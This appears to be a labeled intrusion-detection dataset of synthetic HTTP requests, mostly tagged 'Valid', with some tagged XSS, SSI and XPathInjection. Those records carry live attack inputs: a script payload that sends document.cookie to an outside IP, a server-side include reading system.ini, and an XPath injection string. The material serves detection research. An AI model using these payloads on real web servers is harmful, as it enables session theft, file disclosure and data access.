X-Forwarded-For: 60.44.207.26
X-Serial-Number: 317162195276859
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rltax9pweeBHg=8&buoTsoettmS7s4=htleLa3&e4uefea2Th0=at8/t&catshyhH=llowneRb&ze9r=i  &daeehte4otiiFte=1&cohytz8fi=eeif$r&aiehle9nx=aX5Ul9Zai&eVgaysMy=9109&XkWYsamFeIPA=iXttPI&0duec2yk7=mamwndyenl&tNqhleSjhiejWq=marr|n'g eeb

End - Id: 7096
Start - Id: 28501
class: Valid
GET /aoEnen/rt/57gEQXM7h_qjE0pc7/nsretgits/u1arlheitc/akdPPzeItchFUbp3KV/dya3YuapagleJXxltf/cj4OYVeM@6igRdS1/6FfnLDfDjdelete/h4Zx0km/srhgwta1nsMmueeb.cgi?YUHPY8_xYR=iestsnHpHq%3Cs&oreeAownat=winntd&olj=tmp&yrts9i=usMIchhnsi&v9l0Ler=io&imgFHlMKXP6object=164454&X.oscriptN=cCzAUx5&lNtlotbIt=0&Q0uDA=efzsIs%2F0ihwep&me2oohEsnd=urh&dmnsmsae3pgn=y3tMHV&sonreArehPt=svghcwuAs&aphMrhSnnsusoi=kea&ueDnn=mFnoo&ouetnrnoeteatqG=Pibgeodficnkskp HTTP/1.0
Host: 68.18.242.88
Connection: keep-alive
Accept: audio/*;q=0.3, video/quicktime, text/*;q=0.4
Accept-Charset: cp-936, isiri-3342;q=0.0, windows-1258;q=0.6, gb2312, iso-8859-8-i;q=0.5
Accept-Encoding: 
Accept-Language: 2ei-eah3i, 3nemetI-dgeAa, uom-eioan;q=0.9, tPr8lg-se6R41;q=0.6, dd-l0hltbxn;q=0.3
Cache-Control: hIm=j7Vd
Client-ip: 229.55.227.78
Cookie: nq0ge=5675;gqteHutenTa=erooa1iteowloE
Cookie2: $Version="5"
Date: Sat, 28 Feb 04 05:03:53 GMT
ETag: "vfM25fxwx3Yntzb"
Expect: avTnne
From: weeraMkt@tseeEat.it
If-Modified-Since: Tue, 03 May 05 16:36:39 CET
If-Unmodified-Since: Sat, 18 Feb 06 04:07:09 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0117
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic ZmVhRG9vMXg6dG5ydGRjZW4=
Authorization: NTLM WGV3cXBtdUF6bWNPYm9sRWJneWJkZGFuaWNJZXNlaGVvYmlnaWFlbmZldA==
Range: -438759
Referer: http://e4aruu.ch/smpoht/eTnet/erseuibq/nmsch/wnhyet.doc
TE: gzip;q=0.5
Trailer: If-None-Match
User-Agent: aenmn (nqm-QgYl; ekSwpWCRg)
UA-CPU: x86
UA-Disp: 8399,990,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 116x668
Via: FTP/0.6 145.228.0.123, 8.0 100.226.16.167, 5.1 www.Ej7Oa.gif
Transfer-Encoding: wgseoo; adbenPLe=iP0Ne
Upgrade: t5rg/1.6
Warning: 758 139.134.163.207 "9ssartsdi" 
X-Forwarded-For: 36.15.26.228
X-Serial-Number: 77486322
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 28501
Start - Id: 19766
class: Valid
GET /EafV/nEJN4J5HE/oHjaWVY0AO_4w36Isb.html?ndeoq3Naoas=524861&ree=3igssr4on2otbttyd&yssr=Snap&iMio3s=ihrnc%40%3E7+&ac=snfsgenihnti&lasKpehsoc=e9nls9enifeett&ZwayA=p&8imd6dlnm8m=th9AWj0T0&LK674SH1BA=uu%3Dwl5sd HTTP/1.0
Host: www.sm4iE.st
Connection: 8iiei
Accept: video/*
Accept-Charset: x-mac-icelandic;q=0.6, cp-950, hz-gb-2312;q=0.2
Accept-Encoding: *
Accept-Language: i-bt;q=0.7, essa-2, Tpuwltno-6toolae2;q=0.2
Cache-Control: max-stale=915
Client-ip: 165.121.199.201
Cookie: nwDcq=83482;HSU.i68d=0;0aqtdfxngui=sjhdoga;e5iGmraeEdvgnt=8799
Cookie2: $Version="49"
Date: Thu, 18 May 06 05:47:09 UTC
ETag: "qn@ps1@BA@dwNvcx"
Expect: eeEld
From: pcnrta@8tosedy.fr
If-Modified-Since: Thu, 20 Mar 08 12:56:45 GMT
If-Unmodified-Since: Sun, 02 Mar 08 01:19:06 UTC
If-Match: *
If-None-Match: "1FEMHPYyRiliCOz6"
If-Range: "zDHSiSdltbTHQ0JEYXpI"
Max-Forwards: 014
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM MmlrVDBVbXNrbmR0M25oc3Jpcm5lb3MwNG9hZUl0ZWRubjYxQW1zcTJhMnltaXQ=
Range: 74298-8299,-8816,29108-
Referer: http://lle9.fr/anrD/tnlbFn5/eojy.tiff
TE: trailers,gzip;q=0.1,trailers
Trailer: Upgrade
User-Agent: TttossfaE7soygtdoo
UA-CPU: MIPS
UA-Disp: 108,777,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 6500x1811
Via: FTP/0.0 www.ttodasx.htm, HTTP/2.7 5.174.213.131:54926, HTTP/3.1 183.150.49.176
Transfer-Encoding: deflate
Upgrade: I4m9/3.2, eTss/9.1
Warning: 416 www.geeewv.png:396 "qliehpR7srsnhchrotf" 
X-Forwarded-For: 59.255.139.123
X-Serial-Number: 465640999525707
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19766
Start - Id: 927
class: Valid
GET /hjvW/enhlr1wwDhsolesdBap/WYwp-95EgSgroup by/VfFmlbU2/auuiCb2ikxd/ys/iK-vYytxh8QevlVh_/rcyl3mk6Is/e6yBCmr6dkmQJBt4ZR/rOZzZMAS.J_z/yd.png?ebeotsiy=aJuqYL&tnnrpon=dj5jZ.3Hd&Us3jB=otE&ieher0s27teog=T&8Hm=ahI&xshutdownC0gR@gwget43n=riC5oi6TeEnr&Fth=hhghwEv&Y1fO.6_nph-FPimg=av HTTP/1.0
Host: www.h4yzE.gov
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1252;q=0.8, windows-1254, macintosh;q=0.5, x-mac-japanese;q=0.2, windows-1251;q=0.2
Accept-Encoding: *
Accept-Language: rUnh-i;q=0.7, sp-tnhjheee;q=0.2
Cache-Control: max-stale=1
Client-ip: 36.42.207.254
Cookie: slv=tnh;webs=8817597;ogdE1wiMzo=hIms21p1g5ef4e0c;hhvZYZ=&>s;aime=eez+;6WorPq6M=84
Cookie2: $Version="9"
Date: Tue, 07 Dec 04 16:29:58 UTC
ETag: "jr06Kr9AbFL4OWD"
Expect: ot7din=9aHhn
From: shr8m@eagitmhb.de
If-Modified-Since: Wed, 12 Dec 07 20:16:29 GMT
If-Unmodified-Since: Sun, 17 Jun 07 16:03:29 GMT
If-Match: "1xhVbR372I2b8SyNB3iN"
If-None-Match: "l1MekAP1tMVNfM9d"
If-Range: Tue, 03 Aug 04 23:02:15 UTC
Max-Forwards: 2
MIME-Version: 3.0
Pragma: weysiHej=rc9
Proxy-Authorization: Digest nc=3BA1ee0d
Authorization: NTLM aDhlNG5lTm9vNThkdDB0dEllbDNpN3MzcjV0dGxlb3JvdGhUbDVldHJvY3da
Range: 37-165,99813-448132
Referer: http://rjus.gov/nmiwyiil/oOri/scdhboid.png
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.6 (Machintosh; U; PPC 5.0; Om-ms; rv:1.8.3) Gecko/59574649
UA-CPU: StrongARM
UA-Disp: 705,7453,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7361x8160
Via: HTTP/7.6 159.166.146.91:2
Transfer-Encoding: compress
Upgrade: iehx1/0.3, ohanrn/8.7, 0ph/6.5, RaOe/2.8
Warning: 028 90.73.184.74:3067 "pe3oiolmIthbRveDesnt" 
X-Forwarded-For: 21.215.62.37
X-Serial-Number: 510626783025324042
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 927
Start - Id: 2509
class: Valid
GET /qypVZT6oO54Sux7kHik/@t2Jli/0l.css?gh=i%27etyda+ttinr&ea7Li=Xd9&momldqxs=g&HdesdtaxIe=iE4&1siwniofe=odoefdRt&1hitearfzsllaa=6tRiwtEfnearmchildir&dtsU=x6e&vE7nph-x9mV2W=etatgaar+3&_Kwp-locationcatKe=tHWkbumk.&entoe4=t4rald%7Cb+%3C&esovsBi=havingo%5CcfveAcsrsa3%3A+1%28&61tcattstdNS=941 HTTP/1.1
Host: 129.73.116.3
Connection: close
Accept: */*
Accept-Charset: iso-8859-9;q=0.9, iso-8859-1
Accept-Encoding: deflate;q=0.6, identity
Accept-Language: itzreafr-OorHr;q=0.7, lqd1-rialdy;q=0.4, 41e-cmniOsxn;q=0.5, kqltfd-aMe
Cache-Control: no-store
Client-ip: 91.201.234.175
Cookie: 8crOro3wXmn6nb6=xohhRdlike5sshhsstseuservices8;iBCxKlsLJ=th ;rnsocorGaik=5ialludeleteehhdo;0aNWm2_EIwyL=iTarhtelnett;ei=f;eeilyhitHnaec=teahme
Cookie2: $Version="9"
Date: Fri, 16 Dec 05 18:25:03 GMT
ETag: ".0IQSDbyQeVX9Up"
Expect: 100-continue
From: ikaya@wqonoaepch.fr
If-Modified-Since: Wed, 27 Oct 04 12:37:08 CET
If-Unmodified-Since: Fri, 15 Sep 06 16:59:02 UTC
If-Match: "Yh5cFRIDkfd-fo4YAX"
If-None-Match: *
If-Range: *
Max-Forwards: 4294
MIME-Version: 7.0
Pragma: nOainst='YmieUtY'
Proxy-Authorization: WbSIb lsbuJu=r4rr
Authorization: Basic dXNlZXJ1OmNtaGk0cg==
Range: 32-6,-041504
Referer: http://www.4ouci.it/trIi/mbobLeS.gif
TE: chunked
Trailer: Trailer
User-Agent: Mozilla/3.4 (Windows; U; WinNT 7.4; mv-4t; rv:3.5.8) Gecko/26806958
UA-CPU: x86
UA-Disp: 5722,6200,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 831x8702
Via: FTP/9.5 128.50.155.165, 7.3 www.emhgh.htm
Transfer-Encoding: gzip
Upgrade: m50ll/0.0, a5sim/2.2, yic0t3/9.0
Warning: 414 www.v1if.htm "m6ttrA" "Sun, 06 Jun 04 10:23:40 UTC"
X-Forwarded-For: 183.107.89.121
X-Serial-Number: 347745233258688600
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2509
Start - Id: 28643
class: Valid
GET /0QG-F-mgO/4k50SQYFheq8.8JRQ/f5/uGcfG.sh?etsis4o=tepsn5+etn&q2k8ewdlelo=nph-sock_stream8&z2eut=xcrgxuii4dldt&6.WgLV=eser&0TOfrmtJ1f=n&2sa=Eefpnrveqeee&Rta2hn1=664&Eshc5bdIOo=tconnects7&fqxFf=7ek&tweunnnetsjemei=z%7Es%5B&3uOo=qog+nsservices+%40u+wWM+K&Zethhlnseec=tpVr.9jAwq&passthrulLLevala-5ur=rhNl%2F&ac8rreo=sEoaOt9anitioo&ulae5a2eyrrw=0796244 HTTP/1.0
Host: 48.6.207.101
Connection: close
Accept: */*
Accept-Charset: iso-8859-9;q=0.6, macintosh, utf-8;q=0.4, iso-2022-jp
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 244.119.213.222
Cookie: e5oe84D=arsseciqiht;Ceshutdown25zcl=erslo%n4ewin ;tstdinhT0A8POyGQ=2mli
Cookie2: $Version="899"
Date: Fri, 31 Aug 07 24:21:39 CET
ETag: "p4ZowzqOkri_rJ-VG0"
Expect: rmwi3a
From: 6EaEszit@irni.st
If-Modified-Since: Sat, 21 Feb 04 10:31:34 CET
If-Unmodified-Since: Sat, 26 Jan 08 05:09:17 UTC
If-Match: *
If-None-Match: "TaqgtBmlLUd87pTqeci"
If-Range: Wed, 31 Mar 04 03:27:19 UTC
Max-Forwards: 722
MIME-Version: 3.8
Pragma: hz4tid=9nst
Proxy-Authorization: Basic cnRtYjppTW9naDVz
Authorization: NTLM b2pudXM5b2FyZXJuN29ibHRoZXNhdWNyc01tcmFhb2Ntb2FhdHNlaTNsclJr
Range: -5208,9131-01794,317-32381
Referer: /xetj5Eca/flZUe/0hamed/Olato3m.php3
TE: trailers
Trailer: Date
User-Agent: Mozilla/2.4 (compatible; b4drhsiwo; Windows NT; aa9b; gtr9tdnpvs; unhh1Gdud)
UA-CPU: 68000
UA-Disp: 8045,183,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 9872x6402
Via: FTP/1.8 140.183.220.195, HTTP/0.3 8.194.12.218
Transfer-Encoding: nltehm; o4geni=Tvyhake
Upgrade: itsea5/7.2, eiy9n/5.3
Warning: 591 107.5.252.51 "obtnp2" "Wed, 11 Feb 09 05:02:16 CET"
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 6114886940251
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28643
Start - Id: 46820
class: XSS
POST /im_X._361b_LAFPeG/phpAP.html? HTTP/1.0
Content-Length: 391
Content-Language: ftHAA,r
Content-Encoding: identity
Content-Location: /s5d9ey/sned7.pdf
Content-MD5: aUV6d3R2YWVsR3RpYWU2dw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Mar 04 11:05:50 GMT
Last-Modified: Sun, 31 Jul 05 12:28:43 UTC
Host: www.eremqcl.fr:41
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: nehleyy-s;q=0.0, sont2en-s, St6scaDr-tkfc;q=0.6
Cache-Control: piat='ao'
Client-ip: 24.39.240.157
Cookie: rnzePirzspe2o=49;nlao524erisuee=p;xrreox=rinyn;6icuetatch=nbleSdt]e gt
Cookie2: $Version="9"
Date: Mon, 05 Feb 07 22:58:15 CET
ETag: W/"CE44HJExLHf9qTC"
Expect: 100-continue
From: wdvoio@iotd9eelwd.de
If-Modified-Since: Sun, 04 Jan 09 23:33:17 GMT
If-Unmodified-Since: Thu, 25 Sep 08 15:20:57 CET
If-Match: "UX8X8CcOtW5iCLhIO2"
If-None-Match: *
If-Range: *
Max-Forwards: 60
MIME-Version: 8.3
Pragma: ey='bohhde'
Proxy-Authorization: Digest cnonce="dGncrnt"
Authorization: NTLM ZVVyZTYwaWZzM2VlaW9ycm1IZm5zZW90bTRDaHMyaDd1
Range: 175390-78,55-,908690-
Referer: http://www.nyan.ch/swtw/gotri.swf
TE: trailers,gzip;q=0.3,trailers
Trailer: If-None-Match
User-Agent: Iaeuct (vT.wkjI1a; hqLBrs; ooHDTRv; tKtrnLQp; ruFm1cxlng)
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: Rxqa3/5.6 www.1aoe.png, 2.3 85.210.165.210, exqitq/8.5 www.vndr3arh.tiff
Transfer-Encoding: heahN3; boqnoS=ltnft
Upgrade: deT/2.6, f3mc4/0.2, zl2o/8.1, sg21/0.7
Warning: 012 66.34.17.105 "buyInnrnE" 
X-Forwarded-For: 90.185.191.90
X-Serial-Number: 80684101
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

qnitanwlrca5=ar&scriptNzV=<img dynsrc   =   "  javascript:[window.open('http://229.125.173.56/genige.pl'+document.cookie);]    ">&XfPGEE=Rkts-hgsfbctSaaccept&oORsasoSn=CakntesdUe3o3&qnireFsodrei6=t42isddrsv&melr=xiwl$xbiihe]formar egO[&0w6enp=34221&staq=AEeeguned8rm&3sp4=5871369&d4hmnlns=31&vcOs=olkE0oqt@gK&ssne=076&le=s(hxsibgsoundo wpe=h0h

End - Id: 46820
Start - Id: 10555
class: Valid
GET /lt70TSPO6/35MfZ4lSs5vDy1fZ/lhLbQqR6Gm7@I/iOC4w0H_YM.7bjVe/0vZvEoDIIheqPP/lQyBd03FJ2@Qopn/dmuS@XP/IkwQBMtfvoZI.js?tA=5&mNnnunCa6ae=owJAxIg HTTP/1.0
Host: 160.207.3.125
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.9
Cache-Control: lnhnw=ihpspor
Client-ip: 174.215.174.236
Cookie: uwzt=h-DMNTE;rNic=ipmsasee3e9;httpHacceptPsoetccC=mailfgexec
Cookie2: $Version="14"
Date: Tue, 18 Nov 08 09:36:11 UTC
ETag: "CmmphlPXs7s7Y7VrxWY"
Expect: ih5D4t=coayeu
From: lienea@fkubr8mmw0.cz
If-Modified-Since: Tue, 01 Feb 05 22:01:42 GMT
If-Unmodified-Since: Sat, 18 Dec 04 24:56:27 UTC
If-Match: "l1QXm3zCwUWGoFOl"
If-None-Match: *
If-Range: "dXVkpvvvzrYPY4MGQe"
Max-Forwards: 65
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Ithc Ynijwra=smrinc
Authorization: vdp8m grgjPma=E0iil
Range: 92-,4-
Referer: http://www.6ed7.cz/ngaeu/uTya/ea7eia7c.php
TE: deflate,deflate;q=0.7
Trailer: Date
User-Agent: Mozilla/9.0 (Windows; U; Win 9x 4.1; ea-2h; rv:6.9.4) Gecko/86030207
UA-CPU: Sparc
UA-Disp: 7913,7267,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4657x757
Via: 6.2 56.117.168.192
Transfer-Encoding: gzip
Upgrade: aianh/8.9, rdvq9p/7.9, srh/6.2
Warning: 497 64.81.137.239 "prack7" 
X-Forwarded-For: 161.230.166.5
X-Serial-Number: 72395720
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10555
Start - Id: 40642
class: SSI
GET /pallC8abodylOjUz0AEV/u.A-RP24.bTj5/8i/om8oHkWw/riiEamig9imkiCrs/eKQw0zfEmBf1vkGoAL/tirnaasricd/SeslcawuItpwu5tMTh/3-VcASRspPMU2ktL/nsy6nrr6yeara0xt2su/sEa3q5loaoeHiltSu/ta8afose4rcHne8p.dll?moaau=at+soea%3F%27iyh&de=aHrukSc_BM&stSczlqSAv=xheeaatubeo&T.FVl0F6nA=nss78&eztdueqy=45&bzv=pikmh+e&bergNoghd=88479&8e7p9Ahttpsehzvtmp=rnul&aeeuheimtisn=Lnlk7emsse2eiS4tn&eode=t&uen6oecjosh2=i9&eimrlReIeyaa=%3C%21--+++++%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22--%3E HTTP/1.0
Host: 213.70.164.15:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.5
Accept-Language: sin-embhacs;q=0.0
Cache-Control: no-cache
Client-ip: 134.128.236.221
Cookie: tIoAEagu3du3=ou4q;ck4n=206098;QgKV5-odropZC=tMUZZ;emjhcdeah4neqim=Wo6hcrnee;ra=onlosrbgsoundbetweenD0h;z1Rdico8enrmr=sa5y88PrNwu
Cookie2: $Version="7"
Date: Thu, 26 Aug 04 06:15:41 CET
ETag: W/"hnHMbiq6MPPHHNzq2n"
Expect: Ueiiisei
From: temre6@tneo.biz
If-Modified-Since: Tue, 01 Jul 08 04:33:43 UTC
If-Unmodified-Since: Thu, 26 Feb 09 08:15:25 GMT
If-Match: "Ux7PiJTvBP_znqptT"
If-None-Match: *
If-Range: "0_vyhnPoV8LhtikmH"
Max-Forwards: 6894
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic cHRzZWFrOjBsaW1CdA==
Authorization: juft neyufee=gACne
Range: 06-,063-
Referer: http://www.thab.be/tSar/nord/tNrufN/no2zde/7mettut.tiff
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: enKBK-8 http://www.shN6Oher.it
UA-CPU: PowerPC
UA-Disp: 959,926,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 002x244
Via: HTTP/5.2 www.peaphy.css
Transfer-Encoding: gzip
Upgrade: eeyr/9.4
Warning: 799 245.96.63.176 "ln3reeOsrhu8a" 
X-Forwarded-For: 197.32.78.234
X-Serial-Number: 258483037119432010
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40642
Start - Id: 1901
class: Valid
GET /2AlefmoYhQ3a9Zv1Y/Q2n7PV/1C/cJBkH-GTJt/ctnassrccIs/em4MU8t/8htefjeEUlasEp3tse/Hinoinozbnszli/3co3vJnh./boot.iniqhttpjTFmC/DPltJHYVrXksQydocument.msf?ekeqnsgut=5451500&sjhnN2es9zlawbi=3sneSonHesnautp2a&rsgrgrianeorda=aptrg0&OjUWBf-@=eCe%2F&pae6sncsiUl=68777&dttanssncmf7=1203262291&asEao2San=34965914&wf6=8672680&hhmreq=a4Alb.nr0-&jmsseExee4settd=d4aMV HTTP/1.1
Host: 216.21.19.54
Connection: nolo
Accept: audio/basic;q=0.8, video/quicktime
Accept-Charset: iso-8859-8;q=0.2, iso-8859-6;q=0.5, windows-1257, isiri-3342;q=0.4, windows-1258;q=0.9
Accept-Encoding: 
Accept-Language: toeI8-amhtkess;q=0.9
Cache-Control: max-stale
Client-ip: 136.226.137.157
Cookie: eaac3sp=iM5Klisgnvjc;ih9hc=81715630;t8ttNo=46;5dlodvfAeefo=a5includeconnecteed3eaos;snb=fl8 ;aw7siMzdropMk=soNu
Cookie2: $Version="83"
Date: Sat, 29 Nov 08 07:21:14 UTC
ETag: "qNutOB3vtTVndh_m@TX"
Expect: neSrn4=ecsarcdw
From: mddx@tteFnutt.it
If-Modified-Since: Mon, 02 Apr 07 19:01:23 UTC
If-Unmodified-Since: Mon, 23 Jan 06 09:15:19 GMT
If-Match: "QuHOHH6_0JJqipk"
If-None-Match: *
If-Range: Mon, 27 Sep 04 23:27:41 UTC
Max-Forwards: 093
MIME-Version: 2.8
Pragma: c='eosqiree'
Proxy-Authorization: wrea ltni=8Rsiyra
Authorization: IA9to hrtdebSR=fd3uaeb
Range: 3513-,5034-3
Referer: http://gmcii.st/den2na/A5ls4ffm/gir7o/rpdoe/ardrI.pl
TE: trailers,trailers
Trailer: Expect
User-Agent: uEhIlF http://www.htesnt.org
UA-CPU: PowerPC
UA-Disp: 272,378,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 594x6031
Via: FTP/0.0 www.sein7ent.html, FTP/6.3 36.241.31.148
Transfer-Encoding: tWstb3
Upgrade: olz/0.5
Warning: 924 www.bbtn.js "trtrnasnAn" 
X-Forwarded-For: 96.142.115.10
X-Serial-Number: 1247280154947
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1901
Start - Id: 49835
class: XPathInjection
GET /O-E47i_5SK4-k/zoeemse/eWJaem/@xNBFD1T_Vc6/aQ3QTgfJOht.jsp?zstyleZQdnY=17051&reotymeu=a1likeolanr%27u%26-Se&JwinntR6.fdropautoexec=msrmcmd2n&e8yrRnsc8crEr=63592++++or+++1%3C+++Uar%2F8rne%2FnuaqN%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D057%5D++++or+++89%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&heea4scXEia=fi%7C%3B&tpnledei=887&enitehoons=686992&ndcihOorn=telconnecte HTTP/1.0
Host: 12.129.207.233:80
Connection: dh1peS
Accept: video/*;q=0.0
Accept-Charset: *
Accept-Encoding: identity, deflate, gzip, gzip, gzip;q=0.3
Accept-Language: *
Cache-Control: no-transform
Client-ip: 77.69.248.51
Cookie: kJOall=u shliurlaeelcd
Cookie2: $Version="7"
Date: Fri, 25 Mar 05 03:23:46 CET
ETag: "cRd@wIXMwE63R.EvjfGq"
Expect: sgt9Obf=4tdadt
From: noamdhg@Dea3h8.biz
If-Modified-Since: Sat, 18 Oct 08 08:24:46 UTC
If-Unmodified-Since: Tue, 15 Aug 06 24:14:26 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 148
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: Basic bW5yb25uNzplT2VkdGg=
Range: -16,498057-,69-3
Referer: http://www.eidnobln.fr/aTnre/mpcChfl/Oernt/gehs/fsea.cgi
TE: trailers
Trailer: Accept
User-Agent: Mozilla/7.2 (Windows; U; WinNT 7.0; rt-dM; rv:9.6.4) Gecko/43636281
UA-CPU: Sparc
UA-Disp: 662,518,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 172x6984
Via: 8.9 125.86.207.55, HTTP/1.5 206.2.116.137
Transfer-Encoding: deflate
Upgrade: oega/2.1, oaa/9.5, pharkT/6.9, nba/7.2, nha/2.3
Warning: 245 www.ameroeqh.js "imm4hes1ae" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 684744620
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49835
Start - Id: 21709
class: Valid
GET /2sEoae35kEieaarei/hgi3f/V@YdRZ8cSPACAb/RtyemFdsg8mlshodnh3/aanfw/esanpruc/eo.cgi?ienoxs=+0m9ra%26%3A&logX-Sdg=sho%28esro2%29 HTTP/1.1
Host: www.hlnif0h.de
Connection: keep-alive
Accept: image/*, text/*;q=0.1, image/png;q=0.6
Accept-Charset: x-mac-japanese;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 59.146.57.156
Cookie: 6sx3nxhinrSpo=465895;isq=catphpprh;Kconnect3T_=oew0atironehsaeh2;u8zicihoennhu=0568536418;j8wp-TL6ATMU4=wAX7-jM;bKadminx_bnog=tAnSSVP_
Cookie2: $Version="651"
Date: Fri, 05 Nov 04 21:56:33 CET
ETag: W/"SVQ1pQYh6OCY1WFqHRW"
Expect: rhOizt=mrco;hih4i=imr8i
From: oteJo@zdjaie.biz
If-Modified-Since: Tue, 07 Nov 06 16:00:48 UTC
If-Unmodified-Since: Tue, 12 Apr 05 09:23:00 CET
If-Match: *
If-None-Match: "p9kWcpEsbtw4F_ud"
If-Range: Sun, 27 Jun 04 20:47:49 CET
Max-Forwards: 8067
MIME-Version: 5.7
Pragma: ti=hhdo8eg
Proxy-Authorization: Basic N3NyZTp1bmUwdG8=
Authorization: Basic YmNoaWE6cnNNZVI=
Range: 5266-9,06-522712,3-
Referer: http://b7rebnDr.it/dIeOs6e/5eept0/tAswx9.php4
TE: chunked,trailers
Trailer: Via
User-Agent: Mozilla/8.0 (compatible; MSIE 0.3; Windows NT; qonaxtc; 7qrc)
UA-CPU: Sparc
UA-Disp: 299,773,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 664x378
Via: HTTP/2.8 204.47.107.33
Transfer-Encoding: deflate
Upgrade: vyhes/0.6, uwb/8.0, iyeiah/2.8
Warning: 456 16.111.210.179 "htasayeJyno" "Fri, 12 Nov 04 12:32:53 CET"
X-Forwarded-For: 4.180.241.12
X-Serial-Number: 602294986
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21709
Start - Id: 13143
class: Valid
GET /a0XUsLkP/KDHsOnc-ldl970dm/azwI7lmF7eOKeGE/cMeRnR.css?etgs9Daghhaei=l13VKGv1GXjQ&M39x6vmailzq=655103&nansud=3843925567&ro1juit=rQqw&aTq6c6=dsa%5D7&oNaopuS=8764&su4=6bhnrmAli%40l%40%3Aelh&rlrOesv=1.YF0PaU7q HTTP/1.0
Host: 18.116.168.162
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: compress
Accept-Language: na2oIi-t2tntge, AlenZn-8rnl2, svEMebm-esSeemer;q=0.7, o4F-f2pan
Cache-Control: ohho=8X
Client-ip: 146.86.114.200
Cookie: YiinsertjQI=oh_doo9I;thoHogncao=hst6n
Cookie2: $Version="5"
Date: Sun, 27 Jun 04 08:19:53 UTC
ETag: "TQJnjWYzeU82nzLT4_LW"
Expect: e2sht=aoay;rsey6i=paia
From: rBs84eg@im6v.st
If-Modified-Since: Fri, 15 Oct 04 10:41:01 GMT
If-Unmodified-Since: Tue, 30 Nov 04 21:18:45 GMT
If-Match: "Ub1FuAvZEPgKylUm"
If-None-Match: *
If-Range: Sun, 06 May 07 17:30:33 UTC
Max-Forwards: 4
MIME-Version: 0.8
Pragma: i=lpeoc
Proxy-Authorization: Basic YnVpYWFnOm9vdHRvT25y
Authorization: Basic b3piZzpkdXJ1bm95
Range: -22,686-,439169-
Referer: http://nefo.gov/6weo4phj/anctiw5/rr7A/bheeqN0e/e6adrr51.jpg
TE: deflate,trailers,trailers
Trailer: Warning
User-Agent: 38JIvK0VWH http://www.riec6.gov
UA-CPU: Sparc
UA-Disp: 806,0738,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 357x4645
Via: HTTP/3.2 124.103.79.133, 2.2 www.ega4qS.png, cth/9.6 87.239.59.92
Transfer-Encoding: identity
Upgrade: ITn/7.8, tiehs/3.3, tet/0.0, M2r/6.0
Warning: 895 www.etea.html "eEseI" "Mon, 03 Mar 08 14:51:32 GMT"
X-Forwarded-For: 141.250.177.130
X-Serial-Number: 193112080
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13143
Start - Id: 11637
class: Valid
GET /6yHGOpJO8wFs.-VtZkK3/jntVaonWlnsnhoPt7ea/esbmwelHFd/lIytUw6ON-YOw6utHy5/P9nsC0ZOkK/eaoruesoad.php3?isemLC=rIfeiitFllaontaede&O5qsests=4393&jistae1eov=1456&kde4hUa=rsock_streamvdeo7&ewetg=tawogroup+byeUxeNev&t5woorhetoen=-moObodycanancn&u4nlHAPL=ibn HTTP/1.1
Host: 55.139.65.251
Connection: keep-alive
